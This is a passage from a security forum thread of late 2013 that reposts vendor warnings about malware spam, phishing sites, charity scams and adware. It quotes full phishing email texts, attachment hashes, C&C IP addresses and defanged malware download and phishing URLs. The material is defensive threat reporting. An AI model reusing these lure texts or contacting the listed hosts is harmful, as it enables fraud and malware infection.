Fake Picture Sharing Email Messages - 2013 Nov 19
Fake Payment Information Notification Email Messages - 2013 Nov 19
Email Messages with Malicious Attachments - 2013 Nov 19
Fake Picture Sharing Email Messages - 2013 Nov 19
Fake Fax Message Delivery Email Messages - 2013 Nov 19
Fake Product Quote Request - 2013 Nov 19
Fake Fax Message Delivery Email Messages - 2013 Nov 19
Fake Payment Confirmation Email Messages - 2013 Nov 19
Fake Personal Photo Sharing Email Messages - 2013 Nov 19
Fake Payment Invoice Email Messages - 2013 Nov 19
Fake Shipment Tracking Information Email Messages - 2013 Nov 19
Fake Product Order Notification Email Messages - 2013 Nov 19
Fake Scanned Image Notification Email Messages - 2013 Nov 19
Fake Product Purchase Order Email Messages - 2013 Nov 19
Fake Product Purchase Order Email Messages - 2013 Nov 19
Fake Bank Payment Notification Email Messages - 2013 Nov 19
Fake Customer Complaint Attachment Email Messages - 2013 Nov 19
(More info and links at the cisco URL above.)

:mad: :mad:

AplusWebMaster
2013-11-20, 15:33
FYI...

Fake mileage reimbursement email leads to malware ...
- http://www.webroot.com/blog/2013/11/20/fake-annual-form-std-261-authorization-use-privately-owned-vehicle-state-business-themed-emails-lead-malware/
Nov 20, 2013 - "Want to file for mileage reimbursement through a STD-261 form? You may want to skip the tens of thousands of -malicious- emails currently in circulation, attempting to trick users into executing the malicious attachment. Once downloaded, your PC automatically joins the botnet operated by the cybercriminal(s) behind the campaign, undermining the confidentiality and integrity of the host.
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/11/STD261_Fake_Rogue_Malicious_Fraudulent_Email_Spam_Spamvertised_Social_Engineering_Malware_Malicious_Software-1024x64.png
Detection rate for the spamvertised attachment: MD5: 3aaa04b0762d8336379b8adedad5846b – * ... Trojan.Win32.Bublik.bkri; TrojanDownloader:Win32/Upatre.A. Once executed, the sample starts listening on ports 8412 and 3495... It then attempts to phone back to the following C&C servers... (long list of IP's listed at the first webroot URL above)..."
* https://www.virustotal.com/en/file/e891094bb8a3b68edeb36d56d70312956a24504a78f2a84c61816ccda953cd9c/analysis/1384525049/
___

Red Cross 419 Scam exploits Typhoon Haiyan
- http://www.threattracksecurity.com/it-blog/red-cross-419-scam-exploits-typhoon-haiyan/
Nov 20, 2013 - "There are a number of emails currently in circulation attempting to cash in on the generosity of individuals and organisations wanting to assist the Typhoon Haiyan relief efforts. Another one just landed in our spamtraps, and reads as follows:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/fakehaiyanmail-wm.jpg
... If the poor spelling and generally dreadful formatting of the mail doesn’t give the game away, hopefully the free Yahoo email address will help to tip the balance. This is absolutely a scam, and one that should be directed to the recycle bin / spam folder with all due haste. Elsewhere, Trend Micro are seeing missives related to fake Navy donations* and Symantec are dealing with one “Andrew Stevens” who is asking for donations** via Western Union. You can be sure more of these will emerge in the coming weeks, so please be cautious and don’t reply to any email sent out of the blue. No matter how convincing the mail appears to be, there’s a very good chance your money is going to end up with someone other than who you intended it for."
* http://blog.trendmicro.com/trendlabs-security-intelligence/watching-out-for-typhoon-haiyan-scams

** http://www.symantec.com/connect/blogs/scams-emerge-typhoon-haiyan-strikes-philippines
___

Bitcoin Boom leads to Malware Badness
- http://www.threattracksecurity.com/it-blog/bitcoin-boom-leads-malware-badness/
Nov 20, 2013 - "... you may be tempted to mine some Bitcoins via the art of downloading random files from the internet... The are certainly more than enough options to choose from; Youtube videos, promo sites, Pastebin posts – you name it, they’re all out there and they’re all clamouring for your attention. Just keep in mind that you never really know what you’re signing up to when playing the random download game... Scammers are promoting “no survey Bitcoin generators”, which come with -surveys- attached regardless.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/bitcoins3.jpg
If no survey is available, you’re encouraged to pay for a premium account to access the download.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/bitcoins4.jpg
Elsewhere, the below Pastebin page directs individuals to a Mediafire download. Note that they claim it is “legit”, but the file isn’t theirs and they won’t accept responsibility for any “inconvenience”. Never a good sign, really.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/bitcoins1.jpg
...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/bitcoins2.jpg
... VirusTotal currently flagging it at 8/47*. We’re also seeing a number of files on MEGA, which claim to be Bitcoin Generators (with one claiming to offer up 0.06975 mBTC “every couple of hours” in return for filling in some CAPTCHA codes)... An additional file below (also hosted on MEGA) already flags up at 17/47** on VirusTotal, and we also detect this as Trojan.Win32.Generic!BT... trying to go down the fast and easy route ensures there’s a lot to lose too. If you’re late to the Bitcoin party, bandwagon jumping may result in a nasty fall."
* https://www.virustotal.com/en/file/9332d6300c0761476a87d63b5e73a1846387ba72691b26ab924ffb89c357aa24/analysis/

** https://www.virustotal.com/en/file/00ae28fa8dfff8f664c619278dd14f7b93b1a2f96a8c6209ae57e9e1901cff38/analysis/

:mad::mad: :fear:

AplusWebMaster
2013-11-21, 22:47
FYI...

Fake ADP Anti-Fraud Secure Update Spam
- http://threattrack.tumblr.com/post/67663410958/adp-anti-fraud-secure-update-spam
Nov 21, 2013 - "Subjects Seen:
ALERT! From ADP: 2013 Anti-Fraud Secure Update
Typical e-mail details:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
The certificate will be attached to the computer of the account holder, which disables any fraud activity
Any irregular activity on your account is detected by our safety centre
Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have.

Malicious File Name and MD5:
2013 Anti-Fraud Secure Update.zip (7DF767E9225803F5CA6C1ED9D2B5E448)
2013 Anti-Fraud Secure Update.exe (6A9D66DF6AE25A86FCF1BBFB36002D44)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7f5a6916e64b7718d9a679117cc819c7/tumblr_inline_mwmemcErG21r6pupn.png

Tagged: ADP, Upatre.

:mad::fear::mad:

AplusWebMaster
2013-11-22, 13:13
FYI...

Fake WhatsApp SPAM - exposes users to malware ...
- http://www.webroot.com/blog/2013/11/22/fake-whatsapp-voice-message-notification-themed-emails-expose-users-malware/
Nov 22, 2013 - "... intercepted a currently circulating malicious spam campaign impersonating WhatsApp — yet again — in an attempt to trick its users into thinking that they’ve received a voice mail. Once socially engineered users execute the malicious attachment found in the fake emails, their PCs automatically join the botnet operated by the cybercriminal(s) behind the campaign.
Sample screenshot of the spamvertised malicious email:
> https://www.webroot.com/blog/wp-content/uploads/2013/11/WhatsApp_Fake_Rogue_Malicious_Email_Voice_Message_Notification_Social_Engineering_Malware_Malicious_Software_Cybercrime.png
Detection rate for the spamvertised attachment: MD5: 41ca9645233648b3d59cb52e08a4e22a – * ... TrojanDownloader:Win32/Kuluoz.D. Once executed, it phones back to:
hxxp ://103.4.18.215:8080 /460326245047F2B6E405E92260B09AA0E35D7CA2B1
70.32.79.44
84.94.187.245
172.245.44.180
103.4.18.215
172.245.44.2 ...
* https://www.virustotal.com/en/file/e7f8d088049d74cb12b12780abfd4b726174beecc4b49b4e7b7f5e6c4b04cccb/analysis/1384979533/
___

Watch where you’re logging in ...
- http://www.threattracksecurity.com/it-blog/tesco-bank-credit-card-customers-watch-youre-logging/
Nov 22, 2013 - "If you do your online banking with TESCO, or indeed have a credit card with them you may want to be on the lookout for the following website which is hosting a rather large tally of login pages. The site in question is:
mrqos(dot)com(dot)au/kate/tess/tescr/login(dot)html
and that particular site was flagged not so long ago in the Zone-H defacement mirror, with “KEST” compromising it on or around the 15th of October, 2013.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/tesco0.jpg
Here’s 100 or so identical HTML pages in one directory offering up a TESCO credit card login:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/tesco3.jpg
All of the above pages present end-users with the following login screen:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/tesco4.jpg
The page asks end-users to login to “Tesco bank online banking” with “credit card” mentioned in the top right hand corner. After entering a username, the page asks for more information... you should only ever log in on the homepage of your bank or credit card. Visiting it from URLs in emails or random messages sent your way just won’t cut the mustard – physically type in the URL, ensure there’s a padlock and the connection is encrypted. You won’t find padlocks or encryption on the above pages..."
___

Pokemon X and Y Tumblrs: Warn your Kids
- http://www.threattracksecurity.com/it-blog/pokemon-x-y-tumblrs-warn-kids/
Nov 22, 2013 - "A gentle reminder not to leave your kids alone with their best friend ever, the internet. Pokemon X and Y is by all accounts a raging success, and if the smaller members of your household go Googling for things related to said title, they may well end up on a site such as the below promising a PC download of the new game.
pokemonxetyromemulateur(dot)tumblr(dot)com
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/pokedownload1.jpg
This site intends to direct the end-user to a cookie-cutter blog located at
pokemonxyemulator(dot)blogspot(dot)ro
The site pops a -survey- with offers likely dictated by region. What’s worrying here is if kids arrive on this site given the Pokemon theme, they could well be presented with survey questions asking for personal information alongside the more typical installs (and installs aren’t really something you want to be presenting kids with either).
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/pokedownload2.jpg
In this case, one of the links leads to an iLivid install.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/pokedownload3.jpg
... it mentions a -toolbar- install which is pre-ticked in the next screen... What’s on offer here isn’t a big deal, but there’s no way you can predict what will be on the other end of a survey popup – everything from personal information requests and ringtone offers to Adware and (occasionally) Malware have all been sitting in wait on the other side of that “Complete this” button. While adults may hopefully steer clear of a lot of these antics, any kids going click happy in Pokemon land (or any other themed set of search engine queries) probably won’t be so lucky..."

:mad: :fear:

AplusWebMaster
2013-11-26, 03:23
FYI...

Fake PayPal Spam
- http://threattrack.tumblr.com/post/68070828047/paypal-resolution-of-case-spam
Nov 25, 2013 - "Subjects Seen:
Resolution of case #PP-016-353-161-368
Typical e-mail details:
Transaction ID: 27223374MSB9Y6FV6
Our records indicate that you never responded to requests for additional
information about this claim. We hope you review the attached file and solve the situation amicably.
For more details please see the attached file (Case_9503665.zip)
Sincerely,
Protection Services Department

Malicious File Name and MD5:
Case_9503665.zip (040D3AA61ADB6431576D27E14BA12E43)
Case_.exe (8DB3C24FCD0EF4A660636250D0120B23)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bbfc34678338de568d5f7f9d84a17410/tumblr_inline_mwtvpuDtlR1r6pupn.png

Tagged: PayPal, Upatre
___

Fake HSBC emails - malware
- http://www.webroot.com/blog/2013/11/25/cybercriminals-impersonate-hsbc-fake-payment-e-advice-themed-emails-expose-users-malware/
Nov 25, 2013 - "HSBC customers, watch what you execute on your PCs. A circulating malicious spam campaign attempts to socially engineer you into thinking that you’ve received a legitimate ‘payment e-Advice’. In reality, once you execute the attachment, your PC automatically joins the botnet operated by the cybercriminal(s) behind the campaign.
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/11/HSBC_Fake_Rogue_Malicious_Email_Spam_Spamvertised_Social_Engineering_Malware_Malicious_Software.png
Detection rate for the spamvertised attachment: MD5: 2fbf89a24a43e848b581520d8a1fab27 – * ...Trojan.Win32.Bublik.blgc. Once executed, the sample starts listening on ports 3670 and 6652..."
* https://www.virustotal.com/en/file/1ea24f6fe1dfc8c883da3bd380e1da53f766aa9f3df8eb0ebdd6fb0e8b94182e/analysis/1385042183/
___

.gov, .edu - Phish ...
- http://www.threattracksecurity.com/it-blog/gov-edu-phish-oh/
Nov 25, 2013 - "We’ve noticed a couple of .cn URLs which customers of ANZ will probably want to steer clear of.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cnanz0.jpg
syftec(dot)gov(dot)cn
... appears to be a site about the county-level city Shangyu. One of the URLs on the site is
syftec(dot)gov(dot)cn/images/online/
... which takes users to:
rh(dot)buaa(dot)edu(dot)cn/js/online
... which is a .Edu URL called “China Domestic Research Project for ITER”, with the sub-heading “Key technologies research for remote handling manipulator using in nuclear environment”.
Here’s the frontpage, minus the js/online directory:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cnanz1.jpg
Here’s what is located at the rh(dot)buaa(dot)edu(dot)cn/js/online URL:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cnanz2.jpg
The page asks for name, DOB, address, card number, expiration date and security code. Hitting the log on button will direct users to the genuine ANZ website. The URL has already been blacklisted by Google Safebrowsing:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cnanz4.jpg
What’s interesting here is if the URL forwarding end-users from the .gov site to the .edu page is supposed to be there, or it too has been compromised to direct more users to the ANZ “login”. It’s possible the .gov site once forwarded them to a formerly legitimate page on the .edu portal which has since been compromised. However, the .edu page isn’t on Internet Archive so it’s hard to say one way or the other. What we can say for certain is that customers of ANZ should only log in on the genuine ANZ website*, and that .gov URLs are prime targets..."
* https://www.anz.com/

:mad: :fear:

AplusWebMaster
2013-11-26, 18:54
FYI...

Fake Facebook pwd SPAM - Recoverypassword.zip and Facebook-SecureMessage.exe
- http://blog.dynamoo.com/2013/11/you-requested-new-facebook-password.html
26 Nov 2013 - "This -fake- Facebook message comes with a malicious attachment:
Date: Tue, 26 Nov 2013 04:58:18 +0300 [11/25/13 20:58:18 EST]
From: Facebook [update+hiehdzge@ facebookmail .com]
Subject: You requested a new Facebook password!
facebook
Hello,
You have received a secure message. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
Read your secure message by opening the attachment, Facebook-SecureMessage.zip.
Didn't request this change?
If you didn't request a new password, let us know immediately.
This message was sent to [redacted] at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303

Screenshot: https://lh3.ggpht.com/-20l6OoLiEfc/UpSqzbqg9yI/AAAAAAAACSE/yW-Pfq5-JW8/s1600/facebook3.png

The attachment is Recoverypassword.zip which in turn contains a malicious executable Facebook-SecureMessage.exe which has a VirusTotal detection rate of 16/42*. Automated analysis tools... shows attempted connections to developmentinn .com on 38.102.226.252 (Cogent, US) and spotopia .com on 199.229.232.99 (Enzu, US). Note that the servers on those IPs host dozens of legitimate sites and I cannot say for certain if they are all compromised or not."
* https://www.virustotal.com/en-gb/file/34414881de0d3cdd56832bd5ade4609c1091faabd9f5755eff61109be377caa4/analysis/1385474059/

- https://www.virustotal.com/en/ip-address/199.229.232.99/information/
___

Xerox Incoming Fax Spam
- http://threattrack.tumblr.com/post/68163781381/xerox-incoming-fax-spam
Nov 26, 2013 - "Subjects Seen:
INCOMING FAX REPORT : Remote ID: 633-553-5385 [/i]
Typical e-mail details:
INCOMING FAX REPORT
Date/Time: 11/26/2013 04:51:31 EST
Speed: 17766 bps
Connection time: 07:01
Pages: 3
Resolution: Normal
Remote ID: 633-553-5385
Line number: 633-553-5385
DTMF/DID:
Description: Сost sheet for first half of 2013.pdf

Malicious File Name and MD5:
IncomingFax.zip (A5E6AB0F6ECF230633B91612A79BF875)
IncomingFax.exe (B048E178F86F6DBD54D84F488120BB9B)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d194235ca4bd59fb321f065ff35f21e2/tumblr_inline_mwvl3vV45y1r6pupn.png

Tagged: Xerox, Upatre
___

Something evil on 46.19.139.236
- http://blog.dynamoo.com/2013/11/something-evil-on-4619139236.html
26 Nov 2013 - "46.19.139.236 (Private Layer Inc, Switzerland) seems to be serving up some sort of Java -exploit- kit via injection attacks which is utilising hijacked legitimate domains, but the domains in use seem to rotate pretty quickly and I haven't got a copy of the payload, but VirusTotal has some examples* ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/ip-address/46.19.139.236/information/
___

Fake Loan site delivers adware
- http://www.threattracksecurity.com/it-blog/beware-of-trustfinancial-dot-org/
Nov 26, 2013 - "... a fake loan page from an equally fake financial institution called “Trust Financial Group”.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/02D3B1F566A419CEFACB8E96C52913E1.jpg
Once users visit trustfinancial(dot)org, they are -redirected- to a default page serving a loan decision document. In order for visitors to see its unblurred version, they have to install a “secure loan viewer” application. Unfortunately, users will find out that the name of the program is actually called “Search Smarted and Search Assistor” and is signed by a verified publisher called Access Financial Resources, Inc.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/B98992173625FF8F069029FFC1704ACD.jpg
Here’s another sample that we have acquired:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/36311B015C8950A6322B3B49590EE75C.jpg
A quick search on Google for the name points me to a small company of financial planners in Oklahoma, but I can’t find connections to any legitimate software it’s involved in or to “Trust Financial Group”. We can count on the idea that whoever is behind the bogus page and brand had used the name of a legitimate small financial company to make the certificate appear more authentic, which in turn makes the applications seem legit. Unfortunately, this is -not- the case. The files are not document viewer applications, but they are -adware- programs that, once installed, -injects- ads into search engine results.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/C936F07A4085EBFA62BE550F9F6D03F2.jpg
... Eric Howes, ThreatTrack Security’s Principal Lab Researcher, “The domains used here are all anonymously registered. And while this attack technically isn’t a phishing attack, it is exploiting users’ trust and faith in financial institutions to trick them into installing adware.” Our researchers have further determined that the ads being injected are pulled through the domain, ez-input(dot)info, which was also registered anonymously..."
___

Blackshades Rat usage on the rise...
- http://www.symantec.com/connect/blogs/blackshades-rat-usage-rise-despite-author-s-alleged-arrest
Nov 25, 2013 - "... Blackshades RAT, detected by Symantec products as W32.Shadesrat, will gather passwords and credentials from infected systems, sending them back to the malicious command-and-control (C&C) server. This increase in activity prompted us to investigate the main C&C servers that manage the latest infections. Upon investigation, we found a connection to the Cool Exploit Kit, which has been used to distribute W32.Shadesrat, but also several -other- malware families.
Shadesrat evolution since July 2013:
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Shadesrat%20and%20Cool%20Exploit%201.png
For the last few years we have seen a spectacular increase of attacks against Web servers using recently discovered vulnerabilities to target industries, think tanks, government institutions and users. In all cases, the attacker’s goal is very clear; to execute a malicious payload on the user’s computer. The attackers managed to do this using different exploit kits. When Symantec observed the increase of W32.Shadesrat infections, we identified hundreds of C&C servers being used to gather credentials from compromised computers. W32.Shadesrat targets a wide variety of credentials including email services, Web services, instant messaging applications, and FTP clients. Spammers looking for new mail credentials, attackers trying to continue their security breaches with access to new servers and services, and attackers looking for specific information to exfiltrate might be interested in this kind of information. During our research, we found that nearly all of the C&C servers have hosted exploit kits at some point, and until the arrest of the author of the Blackhole Exploit Kit and the Cool Exploit Kit, the latter has been the most prevalent. These kits try to exploit different vulnerabilities in the user’s computer to execute a malicious payload and infect them. Underground teams have a wide range of resources to perform their attacks.
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Shadesrat%20and%20Cool%20Exploit%202.png
We also observed that after the arrest of the author of the Blackhole Exploit Kit and Cool Exploit Kit, both exploit kits have nearly disappeared, leaving Neutrino as the new kit of choice.
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Shadesrat%20and%20Cool%20Exploit%203.png
Once an unsuspecting user has been compromised, -multiple- payloads are downloaded and used to retain control by using Remote Administration Tools or downloaders that enable them to install additional malware with new functionalities. The C&C servers also spread the following other malware threats.
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Shadesrat%20and%20Cool%20Exploit%204.png
... The distribution of the threats suggests that the attackers attempted to infect as many computers as possible. The attackers do not seem to have targeted specific people or companies. This demonstrates how complete the threat landscape is, as well as the resources that attackers have at their disposal. Don’t forget to make sure that your software is up-to-date and that your antivirus solution has the latest definitions."

:mad::mad: :fear:

AplusWebMaster
2013-11-27, 18:18
FYI...

Fake ADP SPAM - Reference #274135902580" / Transaction.exe
- http://blog.dynamoo.com/2013/11/adp-reference-274135902580-spam.html
27 Nov 2013 - "Is it Salesforce or ADP? Of course.. it is -neither- ...
Date: Wed, 27 Nov 2013 11:50:07 +0100 [05:50:07 EST]
From: "support@ salesforce .com" [support@ salesforce .com]
Subject: ADP - Reference #274135902580
We were unable to process your recent transaction. Please verify your details and try again.
If the problem persists, contact us to complete your order.
Transaction details are shown in the attached file.
Reference #274135902580
This e-mail has been sent from an automated system.
PLEASE DO NOT REPLY...

Attached is a file Transaction_274135902580.zip which in turn contains a malicious executable named Transaction.exe which has an icon to make it look like a PDF file and a VirusTotal detection rate of 8/48*...
> https://lh3.ggpht.com/-SxwSXmXNPHs/UpX1fXSXObI/AAAAAAAACSY/UNYcz2opuj4/s1600/transaction.png
Malwr reports an attempted connection to seribeau .com on 103.6.196.152 (Exa Bytes Network, Malaysia). This IP has several -hundred- legitimate web sites on it, and it is not possible to determine if these are clean or infected."
* https://www.virustotal.com/en-gb/file/ac234318dd27d51436d0233b5d916538c6630d06f7ddcc7d4b6a4d875de95068/analysis/1385558999/

- https://www.virustotal.com/en/ip-address/103.6.196.152/information/
___

Dun & Bradstreet iUpdate Spam
- http://threattrack.tumblr.com/post/68263874738/dun-bradstreet-iupdate-spam
Nov 27, 2013 - "Subjects Seen:
D&B iUpdate : Company Request Processed
Typical e-mail details:
Thank you,
Your request has been successfully processed by D&B.
All information has been reviewed and validated by D&B.
Please Find your Order Information attached.

Malicious File Name and MD5:
CompanyInfo.zip (22CC978F9A6AEE77E653D7507B35CD65)
CompanyInfo.exe (2F3C1473F8BCF79C645134ED84F5EF62)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b39bb51d432ab6e1d846351c04e8a72a/tumblr_inline_mwxg59IRwc1r6pupn.png

Tagged: Dun & Bradstreet, Upatre
___

Tax Return Accountant’s Letter Spam
- http://threattrack.tumblr.com/post/68262070063/tax-return-accountants-letter-spam
Nov 27, 2013 - "Subjects Seen:
FW: 2012 and 2013 Tax Documents; Accountant’s Letter
Typical e-mail details:
I forward this file to you for review. Please open and view it.
Attached are Individual Income Tax Returns and W-2s for 2012 and 2013, plus an accountant’s letter.

Malicious File Name and MD5:
<e-mail recipient>.zip (BC8FC4D02BB86F957F5AE0818D94432F)
TaxReturn.exe (E85AD4B09201144ACDC04FFC5F708F03)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c645b5f4cba8e18c2243a881fd1fe365/tumblr_inline_mwxeqis2ka1r6pupn.png

Tagged: Tax Return, Upatre
___

Russian Photo Attachment Spam
- http://threattrack.tumblr.com/post/68274420361/russian-photo-attachment-spam
Nov 27, 2013 - "Subjects Seen:
Hello
Typical e-mail details:
Hi
My name is Yulia.
I am from Russia.
Look my photo in attachment.

Malicious File Name and MD5:
DSC_0492(copy).jpg.zip (41B37B08293C1BFE76458FA806796206)
DSC_0492(copy).jpg.exe (AC7CD2087014D9092E48CE465E4F902D)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d590cef1826546d83c7e63b46f2231dd/tumblr_inline_mwxmtdo5Ih1r6pupn.png

Tagged: Photo, Sirefef, .

:fear: :mad:

AplusWebMaster
2013-11-28, 17:49
FYI...

Fake Skype voicemail - Trojan SPAM ...
- http://www.theregister.co.uk/2013/11/28/skype_voicemail_alert_spam_flings_zeus_trojan/
28 Nov 2013 - "A spam run of fake Skype voicemail alert emails actually comes packed with malware, a UK police agency warns*. Action Fraud said the zip file attachments come contaminated with a variant of the notorious ZeuS banking Trojan. Messages typically come with the subject line “You received a new message from Skype voicemail service”. The emails contain a copyright notice and a disingenuous warning that "Skype staff will NEVER ask you for your password via email", all in a bid to appear genuine..."
* http://www.actionfraud.police.uk/alert-fake-voicemail-emails-from-skype-contain-virus-nov13

- http://blog.mxlab.eu/2013/11/26/fake-email-you-received-a-new-message-from-skype-voicemail-service-contains-trojan/

:mad: :fear:

AplusWebMaster
2013-12-02, 20:16
FYI...

Fake 'planned outage' SPAM - attachment contains trojan ...
- http://blog.mxlab.eu/2013/12/02/email-regarding-planned-outage-of-mail-server-with-the-instructions-to-save-and-backup-attached-file-contains-trojan/
Dec 2, 2013 - "MX Lab... started to intercept a new trojan distribution campaign by email with the subject “Important update. Please read”. This email is sent from the spoofed address “mail server update” and has the following body:
Dear user!
This is a planned Outage for our MAIL Services on Mon, 02 Dec 2013 11:30:14 +0300
Our MailServer is currently experiencing some problems. It should be working again as usual shortly.
If you want to keep previous saved emails
please download and save your backup from the attached file.
Please do not reply to this message.
This is a mandatory notification containing information about important changes in the products you are using.

Screenshot of the message: http://img.blog.mxlab.eu/2013/20131202_planned_outage.gif

The attached ZIP file has the name saved_mailbox_yoct_F479657BA8.zip and contains the 115 kB large file saved_mail_user_id_8349653__random_numbers__6587234.eml. The trojan is known as Trojan/Win32.Zbot, W32/Trojan.RSKY-7175, Win32/PSW.Fareit.A, Trojan.Ransom.RV or Mal/Generic-S. At the time of writing, 7 of the 47 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 8ff5f6c1e5b368c2e9de2a0d98364f9cae6560ba54874f55779b78a0f487745c
The trojan is capable of downloading files from the internet and according to Malwr it can steal information from local internet browsers and harvest credentials from FTP clients. This last one can perhaps be use to upload a virus or malware to hosts that can use this location for other campaigns.
The trojan will start a new service, make some Windows registry modifications and will make contact with hosts to download a file from:
hxxp ://62.76.45.242/our/1.exe
hxxp ://62.76.42.218/our/1.exe
hxxp ://62.76.45.242/our/2.exe
hxxp ://62.76.42.218/our/2.exe
hxxp ://networksecurityx .hopto .org
The file 1.exe is 369kB large and is identified as W32/Trojan.RSKY-7175 or Trojan.Ransom.RV. The file 2.exe couldn’t be downloaded, the host gave us an 404 error. This executable will create a process ihre.exe on an infected system, modifies the Windows registry, change the firewall policies, installs itself to run when booting the system and collects information to fingerprint the system, peforms HTTP requests and starts servers listening on 0.0.0.0 on port 8989, 0.0.0.0 on port 2626 and 0.0.0.0 on port 0. At the time of writing, 2 of the 48 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink*** and Malwr permalink**** for more detailed information.
SHA256: 8b9ed72674c49abc1aa0ab1c94a8fa13a1b471c23e799c7cce173a67603cb407."
* https://www.virustotal.com/en/file/8ff5f6c1e5b368c2e9de2a0d98364f9cae6560ba54874f55779b78a0f487745c/analysis/1385977408/

** https://malwr.com/analysis/MmRjZDMzZDI0MjgyNGRjZjk5ODAwYWVhNzI0MGJiMzU/

*** https://www.virustotal.com/en/file/8b9ed72674c49abc1aa0ab1c94a8fa13a1b471c23e799c7cce173a67603cb407/analysis/1385978531/

**** https://malwr.com/analysis/Y2QzOWY1NWIzYzY4NDRhZTlhNjdlMTNkZTJmY2JkODY/

- https://www.virustotal.com/en/ip-address/62.76.45.242/information/

- http://google.com/safebrowsing/diagnostic?site=hopto.org/
"... this site was listed for suspicious activity 695 time(s) over the past 90 days..."
___

Toolbar uses Your System to make BTC ...
- http://blog.malwarebytes.org/fraud-scam/2013/11/potentially-unwanted-miners-toolbar-peddlers-use-your-system-to-make-btc/
Nov 29, 2013 - "Potentially Unwanted Programs or PUPs as we like to call them, are things like Toolbars, Search Agents, etc. Unnecessary junk for your desktop that usually involves monitoring your surfing/shopping habits and slowing down your system with their sub-par software that ends up hurting you much more than helping. A recent and unfortunate discovery by some of our users revealed that some of these programs do more than just cover your desktop in ads, they also steal your systems resources for mining purposes... we are taking a look at a PuP that installs a Bitcoin miner on the user system, not just for a quick buck but actually written into the software’s EULA. This type of system hijacking is just another way for advertising based software to exploit a user into getting even more cash.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/VictorPost-1024x420.png
... we received a request for assistance from one of our users about a file that was taking up 50 percent of the system resources on their system. After trying to remove it by deleting it, he found that it kept coming back, the filename was “jh1d.exe”... We did some research and found out that the file in question was a Bitcoin Miner known as “jhProtominer”, a popular mining software that runs via the command line. However, it wasn’t the miner recreating its own file and executing but a parent process known as “monitor.exe” . Monitor.exe* was created by a company known as Mutual Public, which is also known as We Build Toolbars, LLC or WBT. We were able to find out the connection between WBT and Mutual Public thanks to an entry in the Sarasota Business Observer:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/WBT_is_MP.png
Another product belonging to Mutual Public is known as Your Free Proxy.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/YourFreeProxy.png
Your Free Proxy uses the Mutual Public Installer (monitor.exe), obtaining it from an Amazon cloud server... We checked out this cloud server and found monitor.exe but also some additional interesting files, notably multiple types of “silent” installers and a folder called “coin-miner”... We at Malwarebytes are putting our foot down and detecting these threats as what they are, giving our users the option to remove them and never look back..."
* https://www.virustotal.com/en/file/caaab1e0b1ece9f5f150b092d3bbce74a3dd573cdfdcf0e8bfbf8966ed66353e/analysis/
File name: vti-rescan
Detection ratio: 1/48
Analysis date: 2013-11-29

:mad: :fear:

AplusWebMaster
2013-12-03, 21:42
FYI...

Fake AMEX SPAM
- http://threattrack.tumblr.com/post/68886754223/american-express-secure-message-spam
Dec 3, 2013 - "Subjects Seen:
Confidential - Secure Message from AMEX
Typical e-mail details:
The security of your personal information is of the utmost importance to American Express, so we have sent the attached as a secure electronic file.
Note: The attached file contains encrypted data.
If you have any questions, please call us at 800-524-3645, option 1. Representatives are available to assist you Monday through Thursday between 8:00 a.m. and 8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET.
The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited.
Thank you,
American Express

Malicious File Name and MD5:
SecureMail.zip (2986FFD9B827B34DCB108923FEA1D403)
SecureMail.exe (7DC5BF7F5F3EAF118C7A6DE6AF921017)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/59723401b83ae64fa575f3c72696dee8/tumblr_inline_mx8op1XMJQ1r6pupn.png

Tagged: American Express, Upatre
___

Fake eFax SPAM
